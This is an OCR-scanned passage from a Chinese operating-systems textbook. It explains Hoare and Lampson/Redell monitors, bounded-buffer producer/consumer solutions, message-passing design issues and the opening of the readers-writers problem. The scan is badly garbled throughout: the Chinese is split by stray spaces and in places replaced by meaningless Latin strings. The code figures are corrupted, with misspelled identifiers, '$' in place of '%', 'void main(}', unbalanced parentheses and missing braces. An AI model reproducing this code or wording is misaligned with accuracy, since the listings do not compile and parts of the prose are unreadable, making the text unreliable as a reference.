注意 , 在 图 5.16 F, 进程 在 执行 csignal 函数 后 立即 退出 管 程 ， 如 果 在 过 程 最 后 没有 发 生 
csignal, Hoare 建议 发 送 该 信号 的 进程 被 阻塞 ， 从 而 使 管 程 可 用 ， 并 被 放 人 队列 中 直到 管 程 空 
闲 。 此 时 , 一 种 可 能 是 把 阻塞 进程 放置 到 入 口 队列 中 ， 这 样 它 必须 与 其 他 还 没有 进入 管 程 的 进程 
竞争 。 但是， 由 于 在 csignal 函数 上 阻塞 的 进程 已 经 在 管 程 中 执行 了 部 分 任务 ， 因 此 使 它们 优 
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先 于 新 近 进 入 的 进程 是 很 有 意义 的 ， 这 可 以 通过 建立 一 条 独立 的 紧急 队列 来 实现 ， 如 图 5.15 所 


示 。 并 发 Pascal 是 使 用 管 程 的 一 种 语言 ， 


操作 出 现 。 


/* program producerconsumer */ 
monitor boundedbuffer; 

char buffer [N]; 

int nextin, nextout; 

int count; 

cond notfull, notempty; 

void append (char x) 


if (count == N) cwait (notfull); 
buffer [nextin] = x; 

nextin = (mextin + 1) $ N; 
count++; 


/* 缓 冲 区 中 数据 项 个 数 增 一 */ 


csignal (nonempty) ; 
void take (char x) 


if (count == 0) cwait (notempty) ; 
x = buffer [nextout] ; 

nextout = (nextout + 1) $ N); 
count --; 


csignal (notfull); 


nextin = 0; nextout 


void producer () 


ehar x; 
while (true) 


produce (x) ; 
append (x) ; 
} 
void consumer () 
char x; 
while (true) { 
take (x); 


consume (x) ; 


} 


void main(} 


parbegin (producer, consumer) ; 





/* 分 配 N 个 数据 项 空间 

/* 缓冲 区 指针 
/* 缓冲 区 中 数据 项 的 个 数 
/* 为 同步 设置 的 条 件 变量 


/* 缓冲 区 满 ， 防 止 涪 出 


/* 释 放任 何 一 个 等 待 的 进程 


/* RAKE, BEFA 
/* 缓冲 区 中 数据 项 个 数 减 一 
/* 释放 任何 一 个 等 待 的 进程 


/* 管 程 体 
/* 缓冲 区 初始 化 为 空 





图 5.16 ”使 用 管 程 解决 有 界 缓冲 区 的 生产 者 /消费 者 问题 的 方法 
如 果 没 有 进程 在 条 件 x 上 等 待 ，csignal (x) 的 执行 将 不 会 产生 任何 效果 。 


它 要 求 csignal 只 能 作为 管 程 过 程 中 执行 的 最 后 一 个 


而 对 于 信号 量 , 在 管 程 的 同步 函数 中 可 能 会 产生 错误 。 例 如 ,如 果 省 略 掉 boundedbuffer 
管 程 中 的 任何 一 个 csignal 函数 ,那么 进入 相 应 条 件 队 列 的 进程 将 被 永久 阻塞 。 管 程 优 于 信和 号 
量 之 处 在 于 所 有 的 同步 机 制 都 被 限制 在 管 程 内 部 , 因此 , 不 但 易于 验证 同步 的 正确 性 , 而 且 易 于 
检测 出 错误 。 此 外 ， 如 果 一 个 管 程 被 正确 地 编写 ， 则 所 有 进程 对 受 保 护 资 源 的 访问 都 是 正确 的 ; 
而 对 于 信和 号 量 ， 只 有 当 所 有 访问 资源 的 进程 都 被 正确 地 编写 时 ， 资 源 访 问 才 是 正确 的 。 
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5.42 ”使 用 通知 和 广播 的 管 程 


Hoare 关于 管 程 的 定义 [ HOAR74 ] 要 求 在 条 件 队 列 中 至 少 有 一 个 进程 ， 当 另 一 个 进程 为 该 
条 件 产 生 csignal 时 ， 该 队列 中 的 一 个 进程 立即 运行 。 因 此 ,产生 csignal 的 进程 必须 立即 
退出 管 程 ， 或 者 阻塞 在 管 程 上 。 
这 种 方法 有 两 个 缺陷 : 
1) 如 果 产 生 csignal 的 进程 在 管 程 内 还 没有 结束 ， 则 需要 两 个 额外 的 进程 切换 : 阻塞 这 
个 进程 需要 一 次 切换 ， 当 管 程 可 用 时 恢复 这 个 进程 又 需要 一 次 切换 。 
2) 与 信号 相关 的 进程 调度 必须 非常 可 靠 。 当 产生 一 个 csignal 时 ,来 自 相 应 条 件 队列 中 
的 一 个 进程 必须 立即 被 激活 , 调度 程序 必须 确保 在 激活 前 没有 其 他 进程 进入 管 程 , 否则 ， 
进程 被 激活 的 条 件 又 会 改变 。 例 如 ， 在 图 5.16 中 ， 当 产生 一 个 csignal (notempty) 
At, 来 自 notempty 队列 中 的 一 个 进程 必须 在 一 个 新 消费 者 进入 管 程 之 前 被 激活 。 男 一 
个 例子 是 ， 生 产 者 进程 可 能 往 一 个 空 缓冲 区 中 添加 一 个 字符 ， 并 在 发 信号 之 前 失败 ， 那 
LE notempy 队列 中 的 任何 进程 都 将 被 永久 挂 起 。 
Lampson 和 Redell 为 Mesa 语言 开发 了 一 种 不 同 的 管 程 1 LAMP80 |, 他 们 的 方法 克服 了 上 面 
列 出 的 问题 ， 并 支持 许多 有 用 的 扩展 ，Mesa 管 程 结构 还 可 以 用 于 Modula-3 系统 程序 设计 语言 
[NELS91 ]。 在 Mesa 中 ，csignal 原 语 被 cnotify 取代 ，cnotify 可 解释 如 下 : 当 一 个 正在 
管 程 中 的 进程 执行 cnotify (x) 时 ， 它 使 得 x 条 件 队列 得 到 通知 ， 但 发 信号 的 进程 继续 执行 。 
通知 的 结果 是 使 得 位 于 条 件 队列 头 的 进程 在 将 来 合适 的 时 候 且 当 处 理 器 可 用 时 被 恢复 执行 。 但 
E, 由 于 不 能 保证 在 它 之 前 没有 其 他 进程 进入 管 程 , 因而 这 个 等 待 进程 必须 重新 检查 条 件 。 例如 ， 
boundedbuf fer 管 程 中 的 过 程 现在 采用 图 5.17 中 的 代码 。 
让 语句 被 while 循环 取代 ， 因 此 ， 这 个 方案 导致 对 条 件 变 量 至 少 多 一 次 额外 的 检测 。 作 为 回 
报 ， 它 不 再 有 额外 的 进程 切换 ， 并 且 对 等 待 进程 在 cnotify 之 后 什么 时 候 运 行 没有 任何 限制 。 
与 enotify 原 语 相关 的 一 个 很 有 用 的 改进 是 ,给 每 个 条 件 原 语 关联 一 个 监视 计时 器 ， 不 论 
条 件 是 否 被 通知 ， 一 个 等 待 时 间 超 时 的 进程 将 被 设置 为 就 绪 状 态 。 当 被 激活 后 ， 该 进程 检查 相关 
条 件 ， 如 果 条 件 满足 则 继续 执行 。 超 时 可 以 防止 如 下 情况 的 发 生 ， 当 某 些 其 他 进程 在 产生 相关 条 
件 的 信号 之 前 失败 时 ， 等 待 该 条 件 的 进程 被 无 限制 地 推迟 执行 而 处 于 饥饿 状态 。 





void append (char x) 
{ 


while (count == N) cwait(notfull); /* 缓冲 区 满 ， 防 止 溢出 */ 
buffer [nextin] = x; 

nextin = (nextin + 1) $ N; 

count++; /* 缓冲 区 中 数据 项 个 数 增 一 */ 
cnotify (notempty) ; /* 通知 正在 等 待 的 进程 */ 


} 


void take (char x) 


{ 








while (count == 0) cwait (notempty) ; /* BMRA, Bik Ti */ 
x = buffer[nextout] ; 

nextout = (nextout + 1) % N); 

count--; /* 缓冲 区 中 数据 项 个 数 碱 一 */ 
cnotify (notfull) ; /* 通知 正在 等 待 的 进程 */ 





图 5.17 有 界 缓冲 区 管 程 代码 


由 于 进程 是 接 到 通知 而 不 是 被 强制 激活 的 ， 因 此 就 可 以 给 指令 表 中 增加 一 条 cbroadcast 
原 语 。 广播 可 以 使 所 有 在 该 条 件 上 等 待 的 进程 都 被 设置 为 就 绪 状 态 , 当 一 个 进程 不 知道 有 多 少 进 
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程 将 被 激活 时 ， 这 种 方式 是 非常 方便 的 。 例 如 , 在 生产 者 /消费 者 问题 中 ,假设 append 和 take 
函数 都 适用 于 可 变 长 度 的 字符 块 , 此 时 ， 如 果 一 个 生产 者 往 缓冲 区 中 添加 了 一 批 字符 , 它 不 需要 
知道 每 个 正在 等 待 的 消费 者 准备 消耗 多 少 字符 ， 而 仅仅 产生 一 个 cbroadcast， 所 有 正在 等 待 
的 进程 都 得 到 通知 并 再 次 尝试 运行 。 

此 外 ， 当 一 个 进程 难以 准确 地 判定 将 激活 哪个 进程 时 , 也 可 以 使 用 广播 。 存储 管理 程序 就 是 
一 个 很 好 的 例子 。 管 理 程序 有 j 个 空闲 字 节 ,一 个 进程 释放 了 额外 的 个 字 节 ,但 它 不 知道 哪个 
等 待 进程 一 共和 需要 kt 个 字 节 ， 因 此 它 使 用 广播 ， 所 有 进程 都 检测 是 否 有 足够 的 存储 空间 。 

Lampson/Redell 管 程 优 于 Hoare 管 程 之 处 在 于 Lampson/Redell 方法 错误 比较 少 。 在 
Lampson/Redell 方法 中 ， 由 于 每 个 过 程 在 收 到 信和 号 后 都 检查 管 程 变量 ， 并 且 由 于 使 用 了 while 结 
构 , 一 个 进程 不 正确 地 广播 或 发 信号, 不 会 导致 收 到 信号 的 程序 出 错 。 收 到 信号 的 程序 将 检查 相 
关 的 变量 ， 如 果 期 望 的 条 件 没有 满足 ， 它 会 继续 等 待 。 

Lampson/Redell 管 程 的 另 一 个 优点 是 它 有 助 于 在 程序 结构 中 采用 更 模块 化 的 方法 。 例 如 , 考 
虑 一 个 缓冲 区 分 配 程 序 的 实现 ， 为 了 在 顺序 的 进程 间 合 作 ， 必 须 满足 两 级 条 件 ， 

1) 保持 一 致 的 数据 结构 。 管 程 强制 实施 互 斥 ， 并 在 允许 对 缓冲 区 的 另 一 个 操作 之 前 完成 一 

个 输入 或 输出 操作 。 

2) 在 1 级 条 件 的 基础 上 ， 加 上 完成 该 进程 请 求 ， 分 配给 该 进程 所 需 的 足够 的 存储 空间 。 

在 Hoare 管 程 中 ,每 个 信号 传达 1 级 条 件 ， 同 时 也 携带 了 一 个 隐 含 消息 ,“ 我 现在 有 足够 的 
空闲 字 节 ,能够 满足 特定 的 分 配 请 求 "， 因 此 ,该 信号 隐 式 携带 第 2 级 条 件 。 如 果 后 来 程序 员 改 
ET 2 级 条 件 的 定义 ， 则 需要 重新 编写 所 有 发 信号 的 进程 ;如果 程序 员 改 变 了 对 任何 特定 等 待 
进程 的 假设 ( 也 就 是 说 ,等 待 一 个 稍微 不 同 的 2 级 不 变量 ), 则 可 能 需要 重新 编写 所 有 发 信号 的 
进程 。 这 样 就 不 是 模块 化 的 结构 ， 并 且 当 代码 被 修改 后 可 能 会 引发 同步 错误 ( 例如 ， 被 错误 条 
件 唤醒 )。 每 当 对 第 2 级 条 件 做 很 小 的 改动 时 ， 程 序 员 必须 记得 去 修改 所 有 的 进程 。 而 对 于 
Lampson/Redell 管 程 ， 一 次 广播 可 以 确保 1 级 条 件 并 携带 2 级 条 件 的 线索 ， 每 个 进程 将 自己 检 
查 2 级 条 件 。 不 论 是 等 待 者 还 是 发 信号 者 对 2 级 条 件 进行 了 改动 ， 由 于 每 个 过 程 都 会 检查 自己 
的 2 级 条 件 ， 故 不 会 产生 错误 的 唤醒 。 因 此 ，2 级 条 件 可 以 隐藏 在 每 个 过 程 中 。 而 对 Hoare 管 
程 ，2 级 条 件 必 须 由 等 待 者 带 到 每 个 发 信号 的 进程 的 代码 中 ,这 违反 了 数据 抽象 和 进程 间 的 模 
块 化 原理 。 


5.5 消 Bis Animation: Message oust 
进程 交互 时 ， 必 须 满足 两 个 基本 要 求 : Ala. DKA, 进程 间 需 要 同步 ; ATA 
作 ,， 进 程 间 需 要 交换 信息 ， 提 供 这 些 功能 的 一 种 方法 是 消息 传递 。 消 息 传递 还 有 一 个 优点 ,， 即 它 
可 在 分 布 式 系统 、 共 享 内 存 的 多 处 理 器 系统 和 单 处 理 器 系统 中 的 实现 。 
消息 传递 系统 可 以 有 多 种 形式 , 本 节 将 给 出 关于 这 类 系统 典型 特征 的 一 般 介 绍 。 消 息 传 递 的 
实际 功能 以 一 对 原 语 的 形式 提供 : 


send(destination, message) 
receive(source, message) 


这 是 进程 间 进 行 消息 传递 所 需要 的 最 小 操作 集 。 一 个 进程 以 消息 (message ) 的 形式 给 另 一 
个 指定 的 目标 (destination ) 进程 发 送信 息 ; 进程 通过 执行 receive 原 语 接收 信息 ，receive 
原 语 中 指明 发 送 消息 的 源 进 程 (source ) 和 消息 。 

表 5.5 中 列 出 了 与 消息 传递 系统 相关 的 一 些 设计 问题 ， 本 节 的 其 他 部 分 将 依次 分 析 这 些 
问题 。 





同步 格式 
send 内 容 
阻塞 长 度 
无 阻塞 固定 
reveive 可 变 
阻塞 
无 阻塞 
测试 是 否 到 达 
寻 址 排队 规则 
直接 先进 先 出 (FIFO ) 
send 优先 级 
reveive 
隐 式 
间接 
动态 
所 有 权 
5.5.1 同步 


两 个 进程 间 的 消息 通信 和 隐 含 着 某 种 同步 的 信息 : 只 有 当 一 个 进程 发 送 消息 之 后 , 接收 者 才能 
接收 消息 。 此 外 ， 当 一 个 进程 发 出 了 send 或 receive 原 语 后 ， 我 们 需要 确定 会 发 生 什么 。 
考虑 send 原 语 。 首 先 ， 当 一 个 进程 执行 send 原 语 时 ， 有 两 种 可 能 性 : 或 者 发 送 进程 被 阻 
塞 直 到 这 个 消息 被 目标 进程 接收 到 ， 或 者 不 阻塞 。 类 似 地 ， 当 一 个 进程 发 出 receive 原 语 后 ， 
也 有 两 种 可 能 性 : 
1) 如 果 一 个 消息 在 这 之 前 已 经 被 发 送 ， 该 消息 被 接收 并 继续 执行 。 
2 ) 如 果 没 有 正在 等 待 的 消息 ， 则 该 进程 被 阻塞 直到 所 等 待 的 消息 到 达 ， 或 者 该 进程 继续 执 
行 ， 放 弃 接 收 的 努力 。 . 
因此 , 发 送 者 和 接收 者 都 可 以 阻塞 或 不 阻塞 。 通 常 有 三 种 组 合 , 但 任何 一 个 特定 的 系统 通常 
只 实现 一 种 或 两 种 组 合 : 
@ fA send, HÆ receive: 发 送 者 和 接收 者 都 被 阻塞 ， 直 到 完成 信息 的 投递 。 这 种 情况 
有 时 也 称 做 会 合 (rendezvous )， 它 考虑 到 了 进程 间 的 紧密 同步 。 
@ 无 阻塞 send， 阻 塞 receive: 尽管 发 送 者 可 以 继续 ， 但 接收 者 被 阻塞 直到 请 求 的 消息 到 
达 。 这 可 能 是 最 有 用 的 一 种 组 合 ， 它 允许 一 个 进程 给 各 个 目标 进程 尽快 地 发 送 一 条 或 多 
条 消息 。 在 继续 工作 前 必须 接收 到 消息 的 进程 将 被 阻塞 ， 直 到 这 个 消息 到 达 。 例 如 ， 一 
个 服务 器 进程 给 其 他 进程 提供 服务 或 资源 。 
@ 无 阻塞 send， 无 阻塞 receive: 不 要 求 任 何 一 方 等 待 。 
对 大 多 数 并 发 程序 设计 任务 来 说 ， 无 阻塞 send 是 最 自然 的 。 例如， 无 阻塞 send 用 于 请 求 一 
个 输出 操作 ， 如 打印 ， 它 允许 请 求 进程 以 消息 的 形式 发 出 请 求 ， 然 后 继续 。 无 阻塞 send 存在 一 个 
潜在 的 危险 : 错误 会 导致 进程 重复 地 产生 消息 。 由 于 对 进程 没有 阻塞 的 要 求 ， 这 些 消 息 可 能 会 消耗 
系统 资源 ， 包 括 处 理 器 时 间 和 缓冲 区 空间 ， 从 而 损害 其 他 进程 和 操作 系统 。 同 时 ， 无 阻塞 send 给 
程序 员 增 加 了 负担 , 由 于 必须 确定 消息 是 否 收 到 , 因而 进程 必须 使 用 应 答 消 息 , 以 证 实 收 到 了 消息 。 
对 大 多 数 并 发 程序 设计 任务 来 说 ,阻塞 receive 原 语 是 最 自然 的 。 通 常 ， 请 求 一 个 消息 的 
进程 都 需要 这 个 期 望 的 信息 才能 继续 执行 下 去 , 但 是 ,如果 消息 丢失 了 ( 这 在 分 布 式 系统 中 很 可 
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能 发 生 ), 或 者 一 个 进程 在 发 送 预期 的 消息 之 前 失败 了 , 那么 接收 进程 将 会 无 限期 地 被 阻塞 下 去 。 
这 个 问题 可 以 通过 使 用 无 阻塞 receive 来 解决 。 但 是 ， 该 方法 的 危险 是 ， 如 果 消 息 的 发 送 在 一 
个 进程 已 经 执行 了 与 之 相 匹 配 的 receive 之 后 , 该 消息 将 被 丢失 。 其 他 可 能 的 方法 是 允许 一 个 
进程 在 发 出 receive 之 前 检测 是 否 有 消息 正在 等 待 ， 或 者 允许 进程 在 receive 原 语 中 确定 多 
个 源 进程 。 如 果 一 个 进程 正在 等 待 从 多 个 源 进程 发 送 来 的 消息 , 并 且 只 要 有 一 个 消息 到 达 就 可 以 
继续 下 去 时 ， 后 一 种 方法 是 非常 有 用 的 。 


5.5.2 ik 


显然 , send 原 语 中 确定 哪个 进程 接收 消息 是 很 有 必要 的 。 类 似 地 ， 大 多 数 实 现 允 许 接 收 
进程 指明 消息 的 来 源 。 | 

在 send Ñl receive 原 语 中 确定 目标 或 源 进程 的 方案 可 分 为 两 类 : 直接 寻 址 和 间接 寻 址 。 
对 于 直接 寻 址 ( direct addressing )，send 原 语 包 含 目 标 进 程 的 标识 符 ， 而 receive 原 语 有 两 种 
处 理 方式 。 一 种 是 要 求 进程 显 式 地 指定 源 进程 因此, 该 进程 必须 事先 知道 希望 得 到 来 自 哪 个 进 
程 的 消息 , 这 种 方式 对 于 处 理 并 发 进程 间 的 合作 是 非常 有 效 的 。 另 一 种 情况 是 不 可 能 指定 所 期 望 
的 源 进 程 , 例如 打印 机 服务 器 进程 将 接受 来 自 各 个 进程 的 打印 请 求 ， 对 这 类 应 用 使 用 隐 式 寻 址 更 
为 有 效 。 此 时 ，receive 原 语 的 source 参数 保存 了 接收 操作 执行 后 的 返回 值 。 

另 一 种 常用 的 方法 是 间接 寻 址 (indirect addressing )。 在 这 种 情况 下 ， 消 息 不 是 直接 从 发 送 
者 发 送 到 接收 者 , 而 是 发 送 到 一 个 共享 数据 结构 , 该 结构 由 刚 时 保存 消息 的 队列 组 成 , 这 些 队列 
通常 称 为 信箱 ( mailbox )。 因 此 ， 对 两 个 通信 进程 ， 一 个 进程 给 合适 的 信箱 发 送 消 息 ， 另 一 个 从 
信箱 中 获得 这 些 消息 。 

间接 寻 址 通过 解除 发 送 者 和 接收 者 之 间 的 耦合 关系 , 在 消息 的 使 用 上 人 允许 更 大 的 灵活 性 。 发 
送 者 和 接收 者 之 间 的 关系 可 以 是 一 对 一 、 多 对 一 、 一 对 多 或 多 对 多 ( 见 图 5.18 )。 一 对 一 的 关系 
允许 在 两 个 进程 间 建 立 专用 的 通信 链接, 这 可 以 把 它们 之 间 的 交互 隔离 起 来 , 避免 其 他 进程 的 错 
BFR; 多 对 一 的 关系 对 客户 /服务 器 间 的 交互 非常 有 用 ， 一 个 进程 给 许多 别 的 进程 提供 服务 ， 
这 时 ， 信 箱 常 常 称 为 一 个 端口 (port ); 一 对 多 的 关系 适用 于 一 个 发 送 者 和 多 个 接收 者 ， 它 对 于 
在 一 组 进程 间 广 播 一 条 消息 或 某 些 信息 的 应 用 程序 非常 有 用 ;多 对 多 的 关系 使 得 多 个 服务 进程 可 
以 对 多 个 客户 进程 提供 服务 。 





a) 一 对 一 b) 多 对 一 





c) 一 对 多 d) 多 对 多 
图 $.18 间接 的 进程 通信 


进程 和 信箱 的 关联 可 以 是 静态 的 , 也 可 以 是 动态 的 。 端 口 常常 是 静态 地 关联 到 一 个 特定 的 进 
BL, 也 就 是 说 , 端口 是 被 永久 地 创建 并 指定 到 该 进程 。 在 一 对 一 的 关系 中 就 是 典型 的 静态 和 永 
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久 性 的 关系 。 当 有 很 多 发 送 者 时 ， SENN oman isl 基于 这 个 目的 可 以 使 用 
诸如 connect 和 disconnect 之 类 的 原 语 。 

一 个 相关 问题 是 信箱 的 所 有 权 问 题 。 对 于 端口 ， carne, 并 由 接收 进程 创建 。 
因此 ， 当 一 个 进程 被 撤销 时 ,， 它 的 端口 也 随 之 被 销毁 。 对 于 通用 的 信箱 , :操作 系统 可 能 提供 一 个 
创建 信箱 服务 , 这 样 的 信箱 可 以 看 做 是 由 创建 它 的 进程 所 有 , 在 这 种 情况 下 它们 也 同 该 进程 一 起 
Kit; 或 者 也 可 以 看 做 是 由 操作 系统 所 有 ， 这 种 情况 下 销 般 信箱 需要 一 个 显 式 命令 


5.5.3 消息 格式 


消息 的 格式 到 决 于 消息 机 制 的 目标 以 及 该 机 制 是 运行 在 一 台 计算 机 上 还 是 分 布 式 系统 中 。 对 

某 些 操作 系统 , 设计 者 优先 选用 短 的 、 固 定 长 度 的 消息 ,以 减少 处 理 和 存储 的 开销 。 如 果 需 要 传 

递 大 量 的 数据 ， 数 据 可 以 放置 到 一 个 文件 中 ， 消 息 可 以 简单 地 引用 

该 文件 。 一 种 更 灵活 的 方法 是 允许 可 变 长 度 的 消息 。 \ 
图 5.19 给 出 了 一 种 操作 系统 的 支持 可 变 长 度 消息 的 典型 消息 格 ”消息 关 

式 。 该 消息 被 划分 成 两 部 分 : 包含 相关 信息 的 消息 头 和 包含 实际 内 . 

容 的 消息 体 。 消 息 头 可 以 包含 消息 的 源 和 目标 的 标识 符 、 长 度 域 和 

判定 各 种 消息 类 型 的 类 型 域 ， 还 可 能 含有 一 些 额外 的 控制 信息 ， 例 

如 用 于 创建 消息 链表 的 指针 域 、 记 录 源 和 目标 之 间 传递 的 消息 的 数 消息 休 
目 、 顺 序 和 序号 ， 以 及 一 个 优先 级 域 。 


5.5.4 排队 原则 图 5.19 一般 消息 格式 


最 简单 的 排队 原则 是 先进 先 出 原则 , 但 是 当 某 些 消息 比 其 他 消息 更 紧急 时 , 仅 有 这 种 原则 是 
不 够 的 。 一 个 可 选 的 原则 是 允许 指定 消息 的 优先 级 ， 这 可 以 基于 消息 的 类 型 或 者 由 发 送 考 指 定 ， 
另 一 种 选择 是 允许 接收 者 检查 消息 队列 并 选择 下 一 次 接收 哪个 消息 。 
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图 5.20 给 出 了 可 用 于 实施 互 斥 的 消息 传递 方式 (A 5.1, 5.25.6). BRER 
阻塞 receive 原 语 和 无 阻塞 send 原 语 ， 一 组 并 发 进程 共享 一 个 信箱 box， 它 可 供 所 有 进程 在 
发 送 和 接收 消息 时 使 用 , 该 信箱 被 初始 化 成 一 个 无 内 容 的 消息 。 希望 进入 临界 区 的 进程 首先 试图 
接收 一 条 消息 ， 如 果 信 箱 为 空 ， 则 该 进程 被 阻塞 ; 一 旦 进程 获得 消息 , 它 执行 它 的 临界 区 ,然后 
把 该 消息 放 回 信箱 。 因 此 ， 消 息 函 数 可 以 看 向 是 在 进程 之 间 传 递 的 一 个 令 牌 。 








const int n = /* 进程 数 */ 
void P(int i) 
{ 
message msg; 
while (true) { 
receive (box, msg); 
/* 临界 区 */; 
send (box, msg) ; 


/* 其 他 部 分 */; 


E program mutualexclusion */ 


void main () 








create mailbox (box); 
send (box, null); 
parbegin (P(1), P(2), . . ., P(n)); 


图 5.20 ”使 用 消息 的 互 斥 
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上 面 的 解决 方案 假设 有 多 个 进程 并 发 地 执行 接收 操作 ， 则 

© 如 果 有 一 条 消息 ， 它 仅仅 被 传递 给 一 个 进程 ， 其 他 进程 被 阻塞 。 

@ 如 果 消 息 队 列 为 空 ， 所 有 进程 被 阻塞 ; 当 有 一 条 消息 可 用 时 ,只 有 一 个 阻塞 进程 被 激活 ， 

并 得 到 这 条 消息 。 

这 样 的 假设 实际 上 对 所 有 消息 传递 机 制 都 是 真 的 。 

作为 使 用 消息 传递 的 另 一 个 例子 ， 图 5.21 是 解决 有 界 缓冲 区 生产 者 /消费 者 问题 的 一 种 方 
法 。 使 用 消息 传递 最 基本 的 互 斥 能 力 , 该 问题 可 以 通过 类 似 于 图 5.13 的 算法 结构 解决 ,而 图 5.21 
利用 了 消息 传递 的 能 力 ， 除 了 传递 信号 之 外 还 传递 数据 。 它 使 用 了 两 个 信箱 。 当 生产 者 产生 了 
数据 ， 它 作为 消息 被 发 送 到 信箱 mayconsume， 只 要 该 信箱 中 有 一 条 消息 ， 消 费 者 就 可 以 开始 
消费 。 从 此 之 后 mayconsume 作为 缓冲 区 , 缓冲 区 中 的 数据 被 组 织 成 消息 队列 ,缓冲 区 的 大 小 
由 全 局 变量 capacity 确定 。 信 箱 mayproduce 最 初 填 满 了 空 消息 ， 空 消息 的 数量 等 于 信箱 
的 容量 ， 每 次 生产 使 得 mayproduce 中 的 消息 数 缩小 ， 每 次 消费 使 得 mayproduce 中 的 消息 
数 增长 。 

这 种 方法 非常 灵活 , 可 以 有 多 个 生产 者 和 消费 者 ， 只 要 它们 都 访问 这 两 个 信箱 即 癌 。 系 统 其 
至 可 以 是 分 布 式 系统 ， 所 有 生产 者 进程 和 mayproduce 信箱 在 一 个 站 点 上 ， 所 有 消费 者 进程 和 
mayconsume 信箱 在 另 一 个 站 点 上 。 


const int 
capacity = /* 缓冲 区 容量 */ ; 
null = /* 空 消息 */ ; 
int i; 
void producer () 
{ message pmsg; 
while (true) { 
receive (mayproduce,pmsg) ; 
pmsg = produce (); 
send (mayconsume,pmsg) ; 





} 


void consumer () 
message cmsg; 
while (true) { 
receive (mayconsume,cmsg) ; 
consume (cmsg); 
send (mayproduce,null) ; 


void main() 


create mailbox (mayproduce) ; 

create mailbox (mayconsume) ; 

for (int i = 1;i <= capacity;i++) send 
(mayproduce,null) ; 

parbegin (producer, consumer) ; 





图 5.21 使 用 消息 解决 有 界 缓冲 区 生产 者 /消费 者 问题 的 一 种 方法 


、 . ? 
5 . 6 读 者 一 5 者 [可 题 Animation; Reader-Writer 


在 设计 同步 和 并 发 机 制 时 , 如 果 能 与 一 个 著名 的 问题 联系 起 来 , 检测 该 问题 的 解决 方案 对 原 
问题 是 否 有 效 , 这 种 方法 是 非常 有 用 的 。 在 很 多 文献 中 都 有 一 些 频繁 出 现 的 重要 问题 , 它们 不 仅 
是 普遍 性 的 设计 和 问题， 而且 具有 教育 价值 。 前 面 已 经 探讨 过 的 生产 者 /消费 者 问题 就 是 这 样 的 一 
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个 问题 ， 本 节 将 研究 另 一 个 经 典 问题 : 读者 - 写 者 问题 。 

读者 - 写 者 问题 定义 如 下 : 有 一 个 多 个 进程 共享 的 数据 区 ， 这 个 数据 区 可 以 是 一 个 文件 或 者 
一 块 内 存 空间 ， 甚 至 可 以 是 一 组 寄存 器 。 有 一 些 进程 ( reader ) 只 读 取 这 个 数据 区 中 的 数据 ， 一 
HHE (writer) 只 往 数据 区 中 写 数据 ;此 外 还 必须 满足 以 下 条 件 ; 

1) 任意 多 的 读 进程 可 以 同时 读 这 个 文件 。 

2) 一 次 只 有 一 个 写 进程 可 以 写 文件 。 

3) 如 果 一 个 写 进 程 正在 写 文 件 ， 禁 止 任何 读 进程 读 文件 。 

也 就 是 说 , 读 进程 是 不 需要 排斥 其 他 读 进程 的 , 而 写 进 程 是 需要 排斥 其 他 所 有 进程 的 , 包括 
读 进 程 和 写 进程 。 

在 继续 之 前 ， 首 先 让 我 们 区 分 这 个 问题 和 另外 两 个 问题 : 一 般 互 斥 问题 和 生产 者 /消费 者 问 
题 。 在 读者 - 写 者 问题 中 ， 读 进程 不 会 往 数 据 区 中 写 数 据 ， 写 进程 不 会 从 数据 区 中 读数 据 。 更 一 
般 的 情况 是 ,允许 任何 进程 读 写 数据 区 ， 此 时 , 我 们 可 以 把 该 进程 中 访问 数据 区 的 部 分 声明 成 一 
个 临界 区 , 并 强行 实施 一 般 互 斥 问题 的 解决 方法 。 之 所 以 关注 这 种 更 受 限 制 的 情况 , 是 因为 对 这 
种 情况 可 以 有 更 有 效 的 解决 方案 ， 而 一 般 问 题 的 低 效 方法 由 于 速度 过 慢 而 很 难 接受 。 例 如 , 假设 
共享 区 是 一 个 图 书馆 目录 , 普通 用 户 通过 读 目录 可 以 查找 一 本 书 , 一 位 或 多 位 图 书 管理 员 可 以 修 
改 目录 。 在 一 般 解决 方案 中 , 每 次 对 目录 的 访问 都 可 以 看 做 是 访问 一 个 临界 区 , 并 且 用 户 每 次 只 
能 读 一 个 目录 ,这 将 会 带 来 无 法 忍受 的 延迟 。 同 时 ,避免 写 进 程 间 互相 干涉 是 非常 重要 的 ,此 外 
还 要 求 在 写 的 过 程 中 禁止 读 ， 以 避免 访问 到 不 正确 的 信息 。 

生产 者 /消费 者 问题 是 否 可 以 看 做 是 只 有 一 个 写 进程 (生产 者 ) 和 一 个 读 进 程 (消费 者 ) 的 
特殊 读者 - 写 者 问题 呢 ? 答案 是 不 能 。 生 产 者 不 仅仅 是 一 个 写 进程 ， 它 必须 读 取 队列 指针 ， 以 确 
定 往 哪里 写 下 一 项 , 并 且 它 还 必须 确定 缓冲 区 是 否 已 满 。 类 似 地 , 消费 者 也 不 仅仅 是 一 个 读 进程 ， 
它 必须 调整 队列 指针 以 显示 它 已 经 从 缓冲 区 中 移 走 了 一 个 单元 。 

现在 开始 分 析 读 者 - 写 者 问题 的 两 种 解决 方案 。 


5.6.1 读者 优先 


图 5.22 是 使 用 信号 量 的 一 种 解决 方案 ， 它 给 出 了 一 个 读 进 程 和 一 个 写 进程 的 实例 ， 该 方案 
无 需 修改 就 可 用 于 多 个 读 进 程 和 写 进 程 的 情况 。 写 进程 非常 简单 ， 信 和 号 量 wsom 用 于 实施 互 斥 ， 
只 要 一 个 写 进程 正在 访问 共享 数据 区 ,其 他 的 写 进程 和 读 进程 都 不 能 访问 它 。 读 进程 也 使 用 wsem 
实施 互 斥 ， 但 是 ， 为 允许 多 个 读 进 程 ， 当 没有 读 进程 正在 读 时 ， 第 一 个 试图 读 的 读 进 程 需要 在 
ween 上 等 待 。 当 至 少 已 经 有 一 个 读 进 程 在 读 时 ， 随 后 的 读 进 程 无 需 等 待 ， 可 以 直接 进入 。 全 局 
变量 readcount 用 于 记录 读 进 程 的 数目 ， 信 号 量 x 用 于 确保 readcount 被 正确 地 更 新 。 


5.6.2 ” 写 者 优先 


在 前 面 的 解决 方案 中 , 读 进 程 具 有 优先 权 。 当 一 个 读 进程 开始 访问 数据 区 时 ， 只 要 至 少 有 一 
个 读 进 程 正在 读 ， 就 为 读 进程 保留 对 这 个 数据 区 的 控制 权 ， 因此， 写 进 程 有 可 能 处 于 饥饿 状态 。 

图 5.23 给 出 了 另 一 种 解决 方案 ， 它 保证 当 一 个 写 进 程 声明 想 写 时 ， 不 允许 新 的 读 进程 访问 
